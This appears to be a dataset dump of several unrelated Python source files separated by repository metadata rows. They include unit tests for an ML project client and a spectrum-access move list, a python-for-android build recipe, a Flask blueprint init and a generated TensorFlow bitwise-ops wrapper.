resp = self.client.Projects.get_by_id("4efab54c-1571-480f-b4dc-d7c00948b7f8")
self.assertTrue(dataclasses.is_dataclass(resp))
self.assertEqual(resp, project)
def test_add(self):
with HTTMock(add):
project = mlcycle.models.Project(name="Project 1", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.add(project)
self.assertTrue(dataclasses.is_dataclass(resp))
self.assertEqual(resp, project)
def test_update(self):
with HTTMock(update):
project = mlcycle.models.Project(name="Project 2", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.update(project.id, project)
self.assertTrue(dataclasses.is_dataclass(resp))
self.assertEqual(resp, project)
def test_delete(self):
with HTTMock(delete):
project = mlcycle.models.Project(name="Project 2", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.delete(project.id)
self.assertTrue(resp)
def test_check(self):
project = mlcycle.models.Project(name="Project 2", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
self.client.Projects.check(project)
self.assertTrue(True)
if __name__ == '__main__':
unittest.main() | 46.808219 | 179 | 0.68686 | 434 | 3,417 | 5.31106 | 0.165899 | 0.047722 | 0.104121 | 0.117137 | 0.756182 | 0.756182 | 0.725813 | 0.725813 | 0.725813 | 0.704989 | 0 | 0.093999 | 0.156277 | 3,417 | 73 | 180 | 46.808219 | 0.705515 | 0 | 0 | 0.333333 | 0 | 0.070175 | 0.36103 | 0.119661 | 0 | 0 | 0 | 0 | 0.175439 | 1 | 0.210526 | false | 0 | 0.070175 | 0.087719 | 0.385965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0ed3576997599b8f0b0129dc37bd17205b594cd3 | 7,792 | py | Python | src/harness/reference_models/dpa/move_list_test.py | NSF-Swift/Spectrum-Access-System | 02cf3490c9fd0cec38074d3bdb3bca63bb7d03bf | [
"Apache-2.0"
] | 58 | 2015-07-22T14:16:52.000Z | 2022-03-10T09:09:33.000Z | src/harness/reference_models/dpa/move_list_test.py | NSF-Swift/Spectrum-Access-System | 02cf3490c9fd0cec38074d3bdb3bca63bb7d03bf | [
"Apache-2.0"
] | 537 | 2015-07-30T16:28:20.000Z | 2021-09-30T17:12:15.000Z | src/harness/reference_models/dpa/move_list_test.py | NSF-Swift/Spectrum-Access-System | 02cf3490c9fd0cec38074d3bdb3bca63bb7d03bf | [
"Apache-2.0"
] | 51 | 2015-06-30T00:25:15.000Z | 2022-01-21T00:09:22.000Z | # Copyright 2018 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
import os
import unittest
import numpy as np
from reference_models.dpa import move_list
from reference_models.propagation import wf_itm
from reference_models.tools import entities
from reference_models.tools import testutils
# A Protection point namedtuple as required by input
ProtectionPoint = namedtuple('ProtectionPoint', ['latitude', 'longitude'])
class TestDpa(unittest.TestCase):
def setUp(self):
self.original_itm = wf_itm.CalcItmPropagationLoss
def tearDown(self):
wf_itm.CalcItmPropagationLoss = self.original_itm
def test_movelist_single_grant(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+30-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
# Within the move list
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_A_OUTDOOR,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=19.97, max_distance_km=19.98),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3600e6, 3610e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, grants)
# Outside the move list
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_A_OUTDOOR,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=20.1, max_distance_km=20.2),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3600e6, 3610e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
def test_movelist_oob_cata(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km for OOB power -25dBm
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-25)-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_A_OUTDOOR,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=10, max_distance_km=11),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, [])
self.assertListEqual(move_grants, [])
def test_movelist_oob_catb(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km for OOB power -15dBm/10MHz
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-15+8)-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
# Within move list for power
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=19.97, max_distance_km=19.98),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, grants)
# Outside the move list for power
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=20.1, max_distance_km=20.2),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
# Outside the nbor list for distance. -144 at 30km
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-15+8)-0.1) - 20.0)
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=25.1, max_distance_km=25.2),
min_freq_mhz=3600,
max_freq_mhz=3610)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, [])
self.assertListEqual(move_grants, [])
def test_movelist_oob_purge_catb(self):
np.random.seed(1248)
# Configuring for -144dBm circle at 20km for OOB power -3dBm/10MHz
wf_itm.CalcItmPropagationLoss = testutils.FakePropagationPredictor(
dist_type='REAL', factor=1.0, offset=(144+(-13+10+8)-0.1) - 20.0)
point = ProtectionPoint(latitude=36.815, longitude=-76.292)
# Within move list for power
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=19.97, max_distance_km=19.98),
min_freq_mhz=3550,
max_freq_mhz=3570,
chunks_mhz=5)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, grants)
# However only using the last 2 would be out of move list
grants = grants[2:]
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
# Slightly lower than the cutoff power -> none in move list
grants = entities.ConvertToCbsdGrantInfo(
entities.GenerateCbsdList(
1, template_cbsd=entities.CBSD_TEMPLATE_CAT_B_OMNI,
ref_latitude=36.815, ref_longitude=-76.292,
min_distance_km=20.1, max_distance_km=20.2),
min_freq_mhz=3550,
max_freq_mhz=3570,
chunks_mhz=5)
move_grants, nbor_grants = move_list.moveListConstraint(
point, 3540e6, 3550e6, grants,
50, 2000, -144, 3, (150, 200, 0, 25))
self.assertListEqual(nbor_grants, grants)
self.assertListEqual(move_grants, [])
if __name__ == '__main__':
unittest.main()
| 37.104762 | 77 | 0.69212 | 1,012 | 7,792 | 5.123518 | 0.193676 | 0.034716 | 0.030087 | 0.034716 | 0.785921 | 0.774349 | 0.774349 | 0.774349 | 0.774349 | 0.770878 | 0 | 0.102597 | 0.209446 | 7,792 | 209 | 78 | 37.282297 | 0.739123 | 0.151181 | 0 | 0.816901 | 0 | 0 | 0.009113 | 0 | 0 | 0 | 0 | 0 | 0.126761 | 1 | 0.042254 | false | 0 | 0.056338 | 0 | 0.105634 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
161109586b4014c595bff02c5134d8ea3db17127 | 6,055 | py | Python | recipes/android/__init__.py | Janith96/lbry-android | b44770c77fc6103a7f366fac3446366365a74fea | [
"MIT"
] | 4 | 2019-07-09T17:50:46.000Z | 2019-12-07T08:37:58.000Z | recipes/android/__init__.py | Janith96/lbry-android | b44770c77fc6103a7f366fac3446366365a74fea | [
"MIT"
] | 4 | 2020-07-17T01:37:37.000Z | 2020-07-21T14:21:08.000Z | recipes/android/__init__.py | Janith96/lbry-android | b44770c77fc6103a7f366fac3446366365a74fea | [
"MIT"
] | 3 | 2020-02-21T04:34:20.000Z | 2021-03-19T22:32:38.000Z | from pythonforandroid.recipe import CythonRecipe, IncludedFilesBehaviour
from pythonforandroid.util import current_directory
from pythonforandroid.patching import will_build
from pythonforandroid import logger
from os.path import join
class AndroidRecipe(IncludedFilesBehaviour, CythonRecipe):
# name = 'android'
version = None
url = None
src_filename = 'src'
depends = [('pygame', 'sdl2', 'genericndkbuild'), ('python2', 'python3crystax')]
config_env = {}
def get_recipe_env(self, arch):
env = super(AndroidRecipe, self).get_recipe_env(arch)
env.update(self.config_env)
return env
def prebuild_arch(self, arch):
super(AndroidRecipe, self).prebuild_arch(arch)
tpxi = 'DEF {} = {}\n'
th = '#define {} {}\n'
tpy = '{} = {}\n'
bootstrap = bootstrap_name = self.ctx.bootstrap.name
is_sdl2 = bootstrap_name in ('sdl2', 'sdl2python3', 'sdl2_gradle')
is_pygame = bootstrap_name in ('pygame',)
is_webview = bootstrap_name in ('webview',)
is_lbry = bootstrap_name in ('lbry',)
if is_sdl2 or is_webview or is_lbry:
if is_sdl2:
bootstrap = 'sdl2'
java_ns = 'org.kivy.android'
jni_ns = 'org/kivy/android'
elif is_pygame:
java_ns = 'org.renpy.android'
jni_ns = 'org/renpy/android'
else:
logger.error('unsupported bootstrap for android recipe: {}'.format(bootstrap_name))
exit(1)
config = {
'BOOTSTRAP': bootstrap,
'IS_SDL2': int(is_sdl2),
'IS_PYGAME': int(is_pygame),
'PY2': int(will_build('python2')(self)),
'JAVA_NAMESPACE': java_ns,
'JNI_NAMESPACE': jni_ns,
}
with current_directory(self.get_build_dir(arch.arch)):
with open(join('android', 'config.pxi'), 'w') as fpxi:
with open(join('android', 'config.h'), 'w') as fh:
with open(join('android', 'config.py'), 'w') as fpy:
for key, value in config.items():
fpxi.write(tpxi.format(key, repr(value)))
fpy.write(tpy.format(key, repr(value)))
fh.write(th.format(key, value if isinstance(value, int)
else '"{}"'.format(value)))
self.config_env[key] = str(value)
if is_sdl2:
fh.write('JNIEnv *SDL_AndroidGetJNIEnv(void);\n')
fh.write('#define SDL_ANDROID_GetJNIEnv SDL_AndroidGetJNIEnv\n')
elif is_pygame:
fh.write('JNIEnv *SDL_ANDROID_GetJNIEnv(void);\n')
recipe = AndroidRecipe()
'''
from pythonforandroid.recipe import CythonRecipe, Recipe, IncludedFilesBehaviour
from pythonforandroid.util import current_directory
from pythonforandroid.patching import will_build
from pythonforandroid import logger
from os.path import join
class AndroidRecipe(IncludedFilesBehaviour, CythonRecipe):
# name = 'android'
version = None
url = None
src_filename = 'src'
depends = [('pygame', 'sdl2', 'genericndkbuild'), ('python2', 'python3crystax')]
call_hostpython_via_targetpython = False
config_env = {}
def get_recipe_env(self, arch):
env = super(AndroidRecipe, self).get_recipe_env(arch)
env.update(self.config_env)
target_python = Recipe.get_recipe('python2', self.ctx).get_build_dir(arch.arch)
env['PYTHON_ROOT'] = join(target_python, 'python-install')
env['CFLAGS'] += ' -I' + env['PYTHON_ROOT'] + '/include/python2.7'
env['LDFLAGS'] += ' -L' + env['PYTHON_ROOT'] + '/lib' + ' -lpython2.7'
return env
def prebuild_arch(self, arch):
super(AndroidRecipe, self).prebuild_arch(arch)
tpxi = 'DEF {} = {}\n'
th = '#define {} {}\n'
tpy = '{} = {}\n'
bootstrap = bootstrap_name = self.ctx.bootstrap.name
is_sdl2 = bootstrap_name in ('sdl2', 'sdl2python3')
is_pygame = bootstrap_name in ('pygame',)
is_webview = bootstrap_name in ('webview')
is_lbry = bootstrap_name in ('lbry')
if is_sdl2 or is_webview or is_lbry:
if is_sdl2:
bootstrap = 'sdl2'
java_ns = 'org.kivy.android'
jni_ns = 'org/kivy/android'
elif is_pygame:
java_ns = 'org.renpy.android'
jni_ns = 'org/renpy/android'
else:
logger.error('unsupported bootstrap for android recipe: {}'.format(bootstrap_name))
exit(1)
config = {
'BOOTSTRAP': bootstrap,
'IS_SDL2': int(is_sdl2),
'IS_PYGAME': int(is_pygame),
'PY2': int(will_build('python2')(self)),
'JAVA_NAMESPACE': java_ns,
'JNI_NAMESPACE': jni_ns,
}
with current_directory(self.get_build_dir(arch.arch)):
with open(join('android', 'config.pxi'), 'w') as fpxi:
with open(join('android', 'config.h'), 'w') as fh:
with open(join('android', 'config.py'), 'w') as fpy:
for key, value in config.items():
fpxi.write(tpxi.format(key, repr(value)))
fpy.write(tpy.format(key, repr(value)))
fh.write(th.format(key, value if isinstance(value, int)
else '"{}"'.format(value)))
self.config_env[key] = str(value)
if is_sdl2:
fh.write('JNIEnv *SDL_AndroidGetJNIEnv(void);\n')
fh.write('#define SDL_ANDROID_GetJNIEnv SDL_AndroidGetJNIEnv\n')
elif is_pygame:
fh.write('JNIEnv *SDL_ANDROID_GetJNIEnv(void);\n')
recipe = AndroidRecipe()
''' | 36.475904 | 95 | 0.555574 | 655 | 6,055 | 4.961832 | 0.172519 | 0.056 | 0.036923 | 0.035077 | 0.936308 | 0.903385 | 0.903385 | 0.903385 | 0.903385 | 0.903385 | 0 | 0.009257 | 0.322048 | 6,055 | 166 | 96 | 36.475904 | 0.78246 | 0.002642 | 0 | 0.066667 | 0 | 0 | 0.171842 | 0.036697 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.083333 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
16358a88632dcd19e077b1b1ad756253bcba5bcc | 157 | py | Python | app/main/__init__.py | Alikutepa/News-API | f7073d4b935caef14317783444707bb86478ee6b | [
"MIT"
] | null | null | null | app/main/__init__.py | Alikutepa/News-API | f7073d4b935caef14317783444707bb86478ee6b | [
"MIT"
] | null | null | null | app/main/__init__.py | Alikutepa/News-API | f7073d4b935caef14317783444707bb86478ee6b | [
"MIT"
] | null | null | null | from flask import Blueprint
from flask.app import Flask
from flask_bootstrap import Blueprint
main = Blueprint('main', __name__)
from . import views,error
| 19.625 | 37 | 0.802548 | 22 | 157 | 5.5 | 0.454545 | 0.223141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140127 | 157 | 7 | 38 | 22.428571 | 0.896296 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0.6 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
163e98c30db56e297c767a175c75a83901d2ea2e | 40 | py | Python | FactorKeeperClient/gen_factor/__init__.py | JayceSYH/FactorKeeper | c4711c0691aed89b8f38ba47faabbfa40b18c74f | [
"MIT"
] | null | null | null | FactorKeeperClient/gen_factor/__init__.py | JayceSYH/FactorKeeper | c4711c0691aed89b8f38ba47faabbfa40b18c74f | [
"MIT"
] | null | null | null | FactorKeeperClient/gen_factor/__init__.py | JayceSYH/FactorKeeper | c4711c0691aed89b8f38ba47faabbfa40b18c74f | [
"MIT"
] | null | null | null | from .factor_gen import factor_generator | 40 | 40 | 0.9 | 6 | 40 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 40 | 1 | 40 | 40 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1666d2fe72fd06a9714eb0cdfd479cc7851d8222 | 10,250 | py | Python | lesson7.4/tensorflow/python/ops/gen_bitwise_ops.py | magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda | cc226deb7b46852407900f9fec0caf62638defe2 | [
"MIT"
] | 21 | 2018-12-11T20:07:47.000Z | 2021-11-08T13:12:32.000Z | lesson7.4/tensorflow/python/ops/gen_bitwise_ops.py | magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda | cc226deb7b46852407900f9fec0caf62638defe2 | [
"MIT"
] | 1 | 2020-07-07T21:30:02.000Z | 2020-07-08T18:16:03.000Z | lesson7.4/tensorflow/python/ops/gen_bitwise_ops.py | magnusmel/Serverless-Deep-Learning-with-TensorFlow-and-AWS-Lambda | cc226deb7b46852407900f9fec0caf62638defe2 | [
"MIT"
] | 15 | 2018-12-12T02:32:28.000Z | 2021-11-05T20:40:10.000Z | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: bitwise_ops.cc
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
def bitwise_and(x, y, name=None):
r"""Elementwise computes the bitwise AND of `x` and `y`.
The result will have those bits set, that are set in both `x` and `y`. The
computation is performed on the underlying representations of `x` and `y`.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
y: A `Tensor`. Must have the same type as `x`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BitwiseAnd", x=x, y=y, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, y], _ctx)
(x, y) = _inputs_T
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x, y]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BitwiseAnd", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BitwiseAnd", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def bitwise_or(x, y, name=None):
r"""Elementwise computes the bitwise OR of `x` and `y`.
The result will have those bits set, that are set in `x`, `y` or both. The
computation is performed on the underlying representations of `x` and `y`.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
y: A `Tensor`. Must have the same type as `x`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BitwiseOr", x=x, y=y, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, y], _ctx)
(x, y) = _inputs_T
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x, y]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BitwiseOr", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BitwiseOr", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def bitwise_xor(x, y, name=None):
r"""Elementwise computes the bitwise XOR of `x` and `y`.
The result will have those bits set, that are different in `x` and `y`. The
computation is performed on the underlying representations of `x` and `y`.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
y: A `Tensor`. Must have the same type as `x`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BitwiseXor", x=x, y=y, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, y], _ctx)
(x, y) = _inputs_T
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x, y]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"BitwiseXor", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BitwiseXor", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def invert(x, name=None):
r"""Flips all bits elementwise.
The result will have exactly those bits set, that are not set in `x`. The
computation is performed on the underlying representation of x.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"Invert", x=x, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, (x,) = _execute.args_to_matching_eager([x], _ctx)
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Invert", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"Invert", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def population_count(x, name=None):
r"""Computes element-wise population count (a.k.a. popcount, bitsum, bitcount).
For each entry in `x`, calculates the number of `1` (on) bits in the binary
representation of that entry.
**NOTE**: It is more efficient to first `tf.bitcast` your tensors into
`int32` or `int64` and perform the bitcount on the result, than to feed in
8- or 16-bit inputs and then aggregate the resulting counts.
Args:
x: A `Tensor`. Must be one of the following types: `int8`, `int16`, `int32`, `int64`, `uint8`, `uint16`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `uint8`.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"PopulationCount", x=x, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"))
else:
_attr_T, (x,) = _execute.args_to_matching_eager([x], _ctx)
_attr_T = _attr_T.as_datatype_enum
_inputs_flat = [x]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"PopulationCount", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"PopulationCount", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "BitwiseAnd"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "y"
# type_attr: "T"
# }
# output_arg {
# name: "z"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# is_commutative: true
# }
# op {
# name: "BitwiseOr"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "y"
# type_attr: "T"
# }
# output_arg {
# name: "z"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# is_commutative: true
# }
# op {
# name: "BitwiseXor"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "y"
# type_attr: "T"
# }
# output_arg {
# name: "z"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# is_commutative: true
# }
# op {
# name: "Invert"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# output_arg {
# name: "y"
# type_attr: "T"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# }
# op {
# name: "PopulationCount"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# output_arg {
# name: "y"
# type: DT_UINT8
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_INT8
# type: DT_INT16
# type: DT_INT32
# type: DT_INT64
# type: DT_UINT8
# type: DT_UINT16
# }
# }
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n>\n\nBitwiseAnd\022\006\n\001x\"\001T\022\006\n\001y\"\001T\032\006\n\001z\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\220\001\001\n=\n\tBitwiseOr\022\006\n\001x\"\001T\022\006\n\001y\"\001T\032\006\n\001z\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\220\001\001\n>\n\nBitwiseXor\022\006\n\001x\"\001T\022\006\n\001y\"\001T\032\006\n\001z\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\220\001\001\n/\n\006Invert\022\006\n\001x\"\001T\032\006\n\001y\"\001T\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021\n7\n\017PopulationCount\022\006\n\001x\"\001T\032\005\n\001y\030\004\"\025\n\001T\022\004type:\n\n\0102\006\006\005\003\t\004\021")
